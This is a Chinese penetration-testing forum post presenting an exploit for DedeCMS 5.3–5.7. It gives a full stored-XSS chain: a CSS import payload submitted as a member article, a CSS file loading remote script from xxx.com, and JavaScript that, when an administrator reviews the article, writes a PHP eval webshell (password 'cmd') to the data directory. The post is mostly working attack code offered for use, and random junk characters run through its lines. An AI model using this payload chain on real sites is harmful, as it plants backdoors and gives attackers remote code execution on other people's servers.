找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 dedecms xss oday通杀所有版本 可getshell
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 1739|回复: 0
打印 上一主题 下一主题

dedecms xss oday通杀所有版本 可getshell

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-15 13:56:10 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
<DIV id=read_tpc mb10?>漏洞原因:由于编辑器过滤不严,将导致恶意脚本运行。可getshell
7 V+ D) [4 H7 J% N. O9 k为什么说它是ODay呢,能getshell的都算OD把`(鸡肋发挥起来也能变凤凰)) O6 Y8 l. ?- I2 T3 I' m
目前只是测试过5.3到5.7版本。其他更早的版本大家就自由发挥吧。
# ]2 @3 a. \& N5 \下面说说利用方法。
( T- @. h; J/ ?& _( v条件有2个:# \+ M) X# x, R6 I
1.开启注册; b- b. B2 G  _3 X" X: I
2.开启投稿
3 y3 t& n4 a3 w$ y/ X( O* S' _% W, f* q注册会员----发表文章: E0 S+ W+ s) P: C# U% s. `( D3 E$ S
内容填写:
9 h( r" i8 X( R; y" f( B( f* j复制代码
. e6 R4 p! t" E! b& o+ p$ v/ X9 s1 w<style>@im\port'\http://xxx.com/xss.css';</style>
) S4 N/ A+ v7 }, H+ h# @新建XSS.Css! s4 s4 H) }4 V1 R. B; u  ~
复制代码
' c4 H. f+ ^* w. s6 L' L$ b.body{
) c# t: F: ~1 d* @$ ^background-image:url('javascript:document.write("<script src=http://xxx.com/xss.js></script>")') }( ^' G! b! Y/ }; M7 `. \) E
新建xss.js 内容为: A( a8 P5 v8 c* M) h; ?
复制代码! [) Z6 A* c& Y" V) g# t" o& _
1.var request = false;2 ]% b" }$ w2 a
2.if(window.XMLHttpRequest) {  B" I: R( `' e* V# Y
3.request = new XMLHttpRequest();
" u  P1 O/ p! U2 v# Y4.if(request.overrideMimeType) {
0 T3 \% v: `' E5.request.overrideMimeType('text/xml');
6 ^* }1 S; r4 a( \6.}
/ f# R! L! U" ~) f) n5 c7.} else if(window.ActiveXObject) {
* ?& f8 _4 i. H2 B  j- Q9 u8.var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
; M) ^. y6 }, ^+ c" e9.for(var i=0; i<versions.length; i++) {
+ R, r2 S& I( _: |10.try {3 [% X- E8 E. M" \# X; h6 p
11.request = new ActiveXObject(versions);
$ G8 v0 P) t2 B6 I% ]& G12.} catch(e) {}
8 c- F2 q) ?% N$ U; }13.}9 y3 o* v) R1 ^+ J8 M( I; x
14.}
# A) I# `: z4 j) y15.xmlhttp=request;' ]  U% m. Q& i0 @# p* Z" }+ {
16.function getFolder( url ){
# s- N2 ]  D1 X0 n3 l17. obj = url.split('/')
- t. r# E: o" p7 A% _18. return obj[obj.length-2]
' p8 ^' x1 a5 J19.}% \, }% N2 u/ U  b2 w4 Z
20.oUrl = top.location.href;
1 w: B- B7 b  T# L  x21.u = getFolder(oUrl);
- Q( t; X3 a4 r# w9 t, M22.add_admin();3 H8 W( R% B1 g) H0 v
23.function add_admin(){) O& w+ a1 N5 X9 Y3 y2 k
24.var url= "/"+u+"/sys_sql_query.php";& [" A5 ~4 c2 s3 O7 j
25.var params ="fmdo=edit&backurl=&activepath=%2Fdata&filename=haris.php&str=<%3Fphp+eval%28%24_POST%5Bcmd%5D%29%3F>&B1=++%E4%BF%9D+%E5%AD%98++";; f. B4 o1 R' M2 j4 n, |
26.xmlhttp.open("POST", url, true);
+ Q- w* n) [% O+ c27.xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
2 E5 {( a3 F' p- F2 j28.xmlhttp.setRequestHeader("Content-length", params.length);
. t3 ]& i) f, p9 Y29.xmlhttp.setRequestHeader("Connection", "Keep-Alive");2 b6 |0 p1 n' z4 c+ \3 C: a
30.xmlhttp.send(params);
( H" D' A$ q# @9 f5 ~% O  D31.}, M4 z* Y  G  K; K/ ^3 t
当管理员审核这篇文章的时候,将自动在data目录生成一句话haris.php。密码cmd
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表